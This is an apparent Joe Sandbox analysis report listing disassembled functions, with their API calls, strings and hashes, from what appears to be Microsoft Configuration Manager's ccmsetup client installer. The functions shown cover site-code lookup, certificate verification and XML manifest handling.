                                                                                          • <DeploymentMethod Value="%u"/>, xrefs: 005CB567
                                                                                          • <ClientDeploymentMessage ErrorCode="%d">%s%s%s</ClientDeploymentMessage>, xrefs: 005CB615
                                                                                          • <Package ID="%s"/>, xrefs: 005CB44F
                                                                                          • SMB, xrefs: 005CB4F9
                                                                                          • <Additional>%s</Additional>, xrefs: 005CB5E4
                                                                                          • <AlwaysExcludeUpgrade Value="%s"/>, xrefs: 005CB5AE
                                                                                          • <Client Baseline="%d" BaselineCookie="%s" Platform="%d" Langs="%s"/>, xrefs: 005CB405
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_H_prolog3_catchThread
                                                                                          • String ID: <Additional>%s</Additional>$<AlwaysExcludeUpgrade Value="%s"/>$<Client Baseline="%d" BaselineCookie="%s" Platform="%d" Langs="%s"/>$<ClientDeploymentMessage ErrorCode="%d">%s%s%s</ClientDeploymentMessage>$<DeploymentMethod Value="%u"/>$<Package ID="%s"/>$<Packages>%s</Packages>$<SourceLocation Value="%s"/>$<SourceType Value="%s"/>$<UpgradeSchedule Value="%s"/>$SMB
                                                                                          • API String ID: 2262774848-190567240
                                                                                          • Opcode ID: 8c047008ae8aa3b4cdee620c4691c0b0bec964491f0bc94eb2829c17c786e9eb
                                                                                          • Instruction ID: 2d91e14b8905509ec9db29ada8979bc7256f50a8f1576d50744d5d0945f5574a
                                                                                          • Opcode Fuzzy Hash: 8c047008ae8aa3b4cdee620c4691c0b0bec964491f0bc94eb2829c17c786e9eb
                                                                                          • Instruction Fuzzy Hash: 6DB19C71A01219EFDF14DFA4C88AFEEBF7ABF51300F040459E605AB142EB349A45CB91
                                                                                          Function 005F53EA Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 133threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005A0C32: __EH_prolog3_GS.LIBCMT ref: 005A0C39
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F556D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_H_prolog3_catch_
                                                                                          • String ID: !sTempString.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$CCM::Utility::String::find_no_case$pszSearchStr && *pszSearchStr
                                                                                          • API String ID: 1942081746-1650541151
                                                                                          • Opcode ID: b9c4b44051594ec19cb2628b45c9573925ee503883bd236b76271c5ad2d927ba
                                                                                          • Instruction ID: f2d02b4d5cd913d10789d9ccc88dcb87b5e06ccb2d60fa5d6386d86e6137d60e
                                                                                          • Opcode Fuzzy Hash: b9c4b44051594ec19cb2628b45c9573925ee503883bd236b76271c5ad2d927ba
                                                                                          • Instruction Fuzzy Hash: 675189B0D45358EADF10EBA8D94AAEDBFB5BF55310F24810AF214B72C1E7781A05CB61
                                                                                          Function 005B103C Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 131threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B1043
                                                                                            • Part of subcall function 005AA097: __EH_prolog3_catch.LIBCMT ref: 005AA09E
                                                                                            • Part of subcall function 005AA097: GetCurrentThreadId.KERNEL32 ref: 005AA11B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B109C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B10FE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B1169
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B11BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::XML::Document::loadFromXML$SetMaxXmlSize(nMaxSize)$X:\bt\1024777\repo\src\common\inc\ccmxml.h$bSuccess == ((VARIANT_BOOL)-1)$createNewDocument()$getPointer()->loadXML(CCM::Utility::BString(pszXML), &bSuccess)
                                                                                          • API String ID: 3454896115-989401391
                                                                                          • Opcode ID: 776994124b8a619c34991b761aa0b684b089e7d356ae866a57261eb20ea9471a
                                                                                          • Instruction ID: 3797cb5ffed6be6d764036dfb42e281ee162291488ca69c883f76b36958cbc6e
                                                                                          • Opcode Fuzzy Hash: 776994124b8a619c34991b761aa0b684b089e7d356ae866a57261eb20ea9471a
                                                                                          • Instruction Fuzzy Hash: B9412B71E80649ABCB10ABA58D1AFFE7E26FF82B50F184109FA047B2C1C7745B01D799
                                                                                          Function 00615014 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061501B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00615096
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00615100
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006150FB
                                                                                          • spService->QueryInterface(&spCcmResources), xrefs: 006150F6
                                                                                          • ..\CcmConditions.cpp, xrefs: 0061509F
                                                                                          • CCMGetGlobalService(&spService), xrefs: 0061508C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00615091
                                                                                          • CCM::Utility::CcmGetNetworkState, xrefs: 0061504E
                                                                                          • ..\CcmConditions.cpp, xrefs: 00615109
                                                                                          • ..\CcmConditions.cpp, xrefs: 00615086
                                                                                          • ..\CcmConditions.cpp, xrefs: 006150F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$CCM::Utility::CcmGetNetworkState$CCMGetGlobalService(&spService)$spService->QueryInterface(&spCcmResources)
                                                                                          • API String ID: 3454896115-180528593
                                                                                          • Opcode ID: 2b4f469b2f9c63ba90455d755637c88b19c155fc65c18c396e3d8b0482353f6e
                                                                                          • Instruction ID: 19b32b4be1ef4bc019ede36b27532220b0a69dd940af21f383a96446d2a2fc3e
                                                                                          • Opcode Fuzzy Hash: 2b4f469b2f9c63ba90455d755637c88b19c155fc65c18c396e3d8b0482353f6e
                                                                                          • Instruction Fuzzy Hash: D3418FB1D40759EBCF21DFA4C84ABEDBBB5AF95700F188049E541BB381C7B84A458B91
                                                                                          Function 006151B3 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006151BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00615263
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006152C1
                                                                                          Strings
                                                                                          • spService->QueryInterface(&spCcmResources), xrefs: 006152B7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006152BC
                                                                                          • ..\CcmConditions.cpp, xrefs: 00615253
                                                                                          • CCMGetGlobalService(&spService), xrefs: 00615259
                                                                                          • ..\CcmConditions.cpp, xrefs: 006152C9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061525E
                                                                                          • CCM::Utility::CcmIsInConnectedStandby, xrefs: 006151ED
                                                                                          • ..\CcmConditions.cpp, xrefs: 006152B1
                                                                                          • ..\CcmConditions.cpp, xrefs: 0061526B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$CCM::Utility::CcmIsInConnectedStandby$CCMGetGlobalService(&spService)$spService->QueryInterface(&spCcmResources)
                                                                                          • API String ID: 3454896115-222789738
                                                                                          • Opcode ID: d3e8432ad2016c5b6a16ff94f0d5a6b2818989815377c2b4ee9e1059ed409abc
                                                                                          • Instruction ID: 701c59d2213ec67680ef3b491fe63bbaa734851a4d5f0ba13c335b42648698c1
                                                                                          • Opcode Fuzzy Hash: d3e8432ad2016c5b6a16ff94f0d5a6b2818989815377c2b4ee9e1059ed409abc
                                                                                          • Instruction Fuzzy Hash: 8341E0B1D40759DACF10DBF48809BEEBFB5AF95744F188049E401BB381D7B80A41CBA0
                                                                                          Function 00634128 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 106threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0063412F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006341DB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00634279
                                                                                          Strings
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 006341E7
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 006341CB
                                                                                          • (g_pBCryptLib = new BCryptLib()) != 0, xrefs: 0063426F
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 00634285
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006341D6
                                                                                          • (g_pNCryptLib = new NCryptLib()) != 0, xrefs: 006341D1
                                                                                          • CcmUtilLib::CcmLoadCNG_Globals, xrefs: 00634139
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634274
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 00634269
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(g_pBCryptLib = new BCryptLib()) != 0$(g_pNCryptLib = new NCryptLib()) != 0$..\CcmCryptoUtil.cpp$..\CcmCryptoUtil.cpp$..\CcmCryptoUtil.cpp$..\CcmCryptoUtil.cpp$CcmUtilLib::CcmLoadCNG_Globals
                                                                                          • API String ID: 3454896115-3117264267
                                                                                          • Opcode ID: 166754446a021869e801e6f2a446ee07b0d42a8b2437af3840ca6a031bb45869
                                                                                          • Instruction ID: 438f70ca33dbe5e43c8195af8bf21d629d3dcac08693f2729134474be0302406
                                                                                          • Opcode Fuzzy Hash: 166754446a021869e801e6f2a446ee07b0d42a8b2437af3840ca6a031bb45869
                                                                                          • Instruction Fuzzy Hash: 9E318E70A85386DAEF21D7B54C16BBEB9A25F50700F144059F140BB3C2CFB95A41D396
                                                                                          Function 005B2458 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 96threadcomCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B245F
                                                                                          • CoCreateInstance.OLE32(00703398,00000000,00000001,007033A8,?,CCM::Utility::CcmGetNoReadLockContext,00000020,00643C58,00000000), ref: 005B2496
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B24C7
                                                                                          • VariantInit.OLEAUT32(?), ref: 005B24F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B254E
                                                                                          • VariantClear.OLEAUT32(?), ref: 005B2598
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThreadVariant$ClearCreateH_prolog3_catchInitInstance
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(*ppContext)->SetValue(szNoLock, 0, &vtNoLock)$CCM::Utility::CcmGetNoReadLockContext$CcmNoReadLock$CoCreateInstance( CLSID_WbemContext, 0, CLSCTX_INPROC_SERVER, IID_IWbemContext, (void**)ppContext )$X:\bt\1024777\repo\src\common\inc\ccmutil.h
                                                                                          • API String ID: 1698760410-4043095203
                                                                                          • Opcode ID: f419e8df1a08919344bce1ca93c9afc33a121362207f64ca84b472df6f272e8b
                                                                                          • Instruction ID: 82af12ab3f56fe01f7400b4aff1f41739b0d8472b2745c6b6036103202105dc0
                                                                                          • Opcode Fuzzy Hash: f419e8df1a08919344bce1ca93c9afc33a121362207f64ca84b472df6f272e8b
                                                                                          • Instruction Fuzzy Hash: 3331F431A81386AADB20DBB48C1AFEE7E65AF56B20F144105F600BF2C1C7B4574197B1
                                                                                          Function 0062633A Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 90threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00626341
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006263AF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062641B
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00626416
                                                                                          • 0 != pCertContext, xrefs: 006263A5
                                                                                          • ..\CcmCert.cpp, xrefs: 0062639F
                                                                                          • VerifyCertificateChain( pCertContext, dwChainFlags, pszPolicyOID, dwPolicyFlags, hChainEngine, pSmsCtlContext, sRootHash ), xrefs: 00626411
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006263AA
                                                                                          • ..\CcmCert.cpp, xrefs: 006263B7
                                                                                          • ..\CcmCert.cpp, xrefs: 00626423
                                                                                          • ..\CcmCert.cpp, xrefs: 0062640B
                                                                                          • CcmUtilLib::CcmVerifyCertificateChain, xrefs: 00626369
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$CcmUtilLib::CcmVerifyCertificateChain$VerifyCertificateChain( pCertContext, dwChainFlags, pszPolicyOID, dwPolicyFlags, hChainEngine, pSmsCtlContext, sRootHash )
                                                                                          • API String ID: 3353525418-1028597874
                                                                                          • Opcode ID: e9469e8ad82eb3b1dffcbbf19f66585e84429ca1289558ee708499ef11470c8e
                                                                                          • Instruction ID: 1bb164850c3678bafa81247a8973ceb556142759cd02e5628b28775317a7f930
                                                                                          • Opcode Fuzzy Hash: e9469e8ad82eb3b1dffcbbf19f66585e84429ca1289558ee708499ef11470c8e
                                                                                          • Instruction Fuzzy Hash: 2231DEB1D41668FADF11EFA8E84AEEE7E76AF55710F148049F840B7382C7784A01CB61
                                                                                          Function 0058C02F Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 124threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058C036
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C1CC
                                                                                            • Part of subcall function 005A1CAB: __EH_prolog3_GS.LIBCMT ref: 005A1CB2
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Skip getting site version because client deployment is from OSD with auto sitecode., xrefs: 0058C0DB
                                                                                          • AUTO, xrefs: 0058C09D
                                                                                          • CcmSetup::GetSiteCodeAndVersion, xrefs: 0058C042
                                                                                          • ccmsetup.cpp, xrefs: 0058C1BC
                                                                                          • GetSiteVersion( m_sSiteCode, m_oMPs, m_sSiteVersion ), xrefs: 0058C1C2
                                                                                          • SMSSITECODE, xrefs: 0058C066
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C1C7
                                                                                          • Got site code '%s' from AD., xrefs: 0058C157
                                                                                          • ccmsetup.cpp, xrefs: 0058C1D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$AUTO$CcmSetup::GetSiteCodeAndVersion$GetSiteVersion( m_sSiteCode, m_oMPs, m_sSiteVersion )$Got site code '%s' from AD.$SMSSITECODE$Skip getting site version because client deployment is from OSD with auto sitecode.$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1942081746-4160097864
                                                                                          • Opcode ID: 20efdf1cbaddc783745990c8714fd78fa1acffea2d4e20d8be6b77895d0ad2f1
                                                                                          • Instruction ID: 84b851df0eac91646330ea9a4bd1f0d323f4e93939582519f11f14a45cdaf2fd
                                                                                          • Opcode Fuzzy Hash: 20efdf1cbaddc783745990c8714fd78fa1acffea2d4e20d8be6b77895d0ad2f1
                                                                                          • Instruction Fuzzy Hash: 7741E331944215EADF14FBA4C88EBDEBF69BF42704F144209F904B7182DB745A49CBB0
                                                                                          Function 005A702D Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 101threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A7034
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A70F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetupManifest::GetClientVersion$H&l$Item[@FileName='%s']$Version$i386/client.msi$m_spManifest.selectNode(sQuery.c_str(), &spClientMsi)$manifest.cpp$manifest.cpp
                                                                                          • API String ID: 1325713246-201183930
                                                                                          • Opcode ID: f35f133c23144ae0246e37a5cc6504eab9b6b508b5cff95a09ac5740e87eb4e1
                                                                                          • Instruction ID: 31d91f079be48891989bc38b65ee5f029519ff192c2f5e04c423ae60ef51fb05
                                                                                          • Opcode Fuzzy Hash: f35f133c23144ae0246e37a5cc6504eab9b6b508b5cff95a09ac5740e87eb4e1
